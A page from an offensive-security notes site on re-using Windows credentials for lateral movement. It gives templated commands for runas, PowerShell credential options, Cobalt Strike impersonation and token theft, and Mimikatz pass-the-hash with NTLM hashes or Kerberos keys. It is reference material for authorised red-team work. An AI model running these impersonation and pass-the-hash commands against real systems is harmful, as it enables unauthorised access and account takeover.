InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • runas
  • Start-Process / Start-Job
  • Cobalt Strike runas, runu, spawnas, spawnu and make_token
  • Mimikatz Pass-The-Hash
  • Cobalt Strike (using Mimikatz) Pass-The-Hash
  • PowerShell Credential option
  1. Windows
  2. Lateral movements

Local credentials re-use

The local re-use of credentials consist of starting a process on the local system under the security context and privileges of the specified user.

This security context may be used to access resources on the present system as well as moving laterally using various methods (remote Windows services or scheduled tasks, WMI, etc.) that can rely on the current user security context.

runas

Set the main DNS server on the attacking computer to the Domain Controller IP address:

Control Panel -> Network and Internet -> Network and Sharing Center -> Change adapter setting -> right click on the adapter being used -> Properties -> Internet Protocol Version 4 (TCP/IPv4) -> Properties -> Set the Preferred DNS server field

To authenticate locally as another user (with plaintext credentials) and execute PowerShell commands, the runas utility can be used.

# runas
# Use /NetOnly on off-domain machines
runas /NetOnly /user:<DOMAIN>\<USERNAME> "<COMMAND> <COMMAND_ARGS>"
runas /NetOnly /user:<DOMAIN>\<USERNAME> powershell.exe

The NetOnly option will make runas execute on your local computer as the currently logged on user, but any connections to other computers on the network will be made using the user account specified.

Start-Process / Start-Job

The Start-Process and Start-Job PowerShell cmdlets can be used to start a local process under the identify of another user.

To run the specified process in an elevated security context through a interactive logon on a system with User Account Control (UAC) enabled, the -Verb RunAs parameter, for Run as administrator, can be specified.

$secpasswd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $secpasswd)

Start-Process <cmd.exe | powershell.exe | ...> -Credential $creds
Start-Process <cmd.exe | powershell.exe | ...> -Credential $creds -Verb RunAs

$ProcessJob = Start-Job -ScriptBlock { <POWERSHELL> } -Credential $creds
Wait-Job $ProcessJob
Receive-Job -Job $ProcessJob

Cobalt Strike runas, runu, spawnas, spawnu and make_token

On Cobalt Strike, the runas and spawnas beacon commands can be used, respectively, to locally run a command or start a beacon under the security context of the specified user. Both commands rely on a clear password and cannot be used to Pass-the-Hash.

The runas command can also be used in place of the spawnas command by running the beacon deploying PowerShell one-liner, generated using the beacon built-in function Access -> One-liner.

beacon> runas <. | DOMAIN>\<USERNAME> <PASSWORD> <COMMAND> <COMMAND_ARGS>

beacon> spawnas <. | DOMAIN>\<USERNAME> <PASSWORD> <LISTENER>

The make_token beacon command correspond to the runas NetOnly option but cannot be used to create a process and run a specified program. The make_token command will instead replace the Logon Session in the current beacon Windows Access Token, which is used for network Windows authentication, with the make_token provided credentials. The local system access through the beacon will thus not be affected but access to resources over the network will be made using the newly provided credentials.

The change can be reverted using the beacon command rev2self.

beacon> make_token <. | DOMAIN>\<USERNAME> <PASSWORD>

If elevated privileges are obtained on a system, the runu beacon command can be used to run an arbitrary command as a child of another process, effectively running the command in the targeted process security context. Building on this primitive, the spawnu beacon command spawn a beacon, through PowerShell, under another process security context.

Both commands can be used to impersonate any connected user on the compromised system, without the need of knowing their password or NTLM hash, as well as elevate to NT AUTHORITY\SYSTEM.

# beacon> ps

beacon> runu <PID> <COMMAND> <COMMAND_ARGS>

beacon> spawnu <PID> <LISTENER>

Mimikatz Pass-The-Hash

Require elevated privileges on the system.

The Pass-The-Hash module of mimikatz can be used to locally run a process under another user identity using its NTLM hash.

# Default to /run:cmd.exe.
# Command can be any binary such as powershell.exe or mmc.exe for example.
# Specifying arguments is supported as well.

sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> /ntlm:<HASH_NTLM> /run:"<COMMAND>"
sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> [/aes128:<USER_AES128_KEY> | /aes256:<USER_AES256_KEY>] /run:"<COMMAND>"

Cobalt Strike (using Mimikatz) Pass-The-Hash

Require elevated privileges on the system.

On Cobalt Strike, the mimikatz / and steal_token beacon commands can be used to start a process under the specified user identity, using its NTLM hash, and steal then impersonate the newly created process token.

The pth beacon command will wrap the mimikatz Pass-the-hash command and, similarly to the make_token beacon command, replace the Logon Session in the current beacon Windows Access Token, in order to access resources over the network using the provided user identity.

Any token change can be reverted using the beacon command rev2self.

# Both local and over the network impersonation
beacon> mimikatz sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> /ntlm:<NT_HASH> /run:"powershell -w hidden"
beacon> mimikatz sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> [/aes128:<USER_AES128_KEY> | /aes256:<USER_AES256_KEY>] /run:"powershell -w hidden"
  [...]
  PID <PID>

beacon> steal_token <PID>

# Over the network ("/NetOnly") impersonation
pth <. | DOMAIN>\<USERNAME> <NT_HASH>

PowerShell Credential option

Most of the PowerShell's Remote Server Administration Tools (RSAT) cmdlets support the Credential option, to run the cmdlet as the specified user account. An username or a PSCredential object can be used.

A similar mechanism is also implemented in the PowerShell PowerSploit framework.

PreviousLateral movementsNextOver SMB

Last updated 3 years ago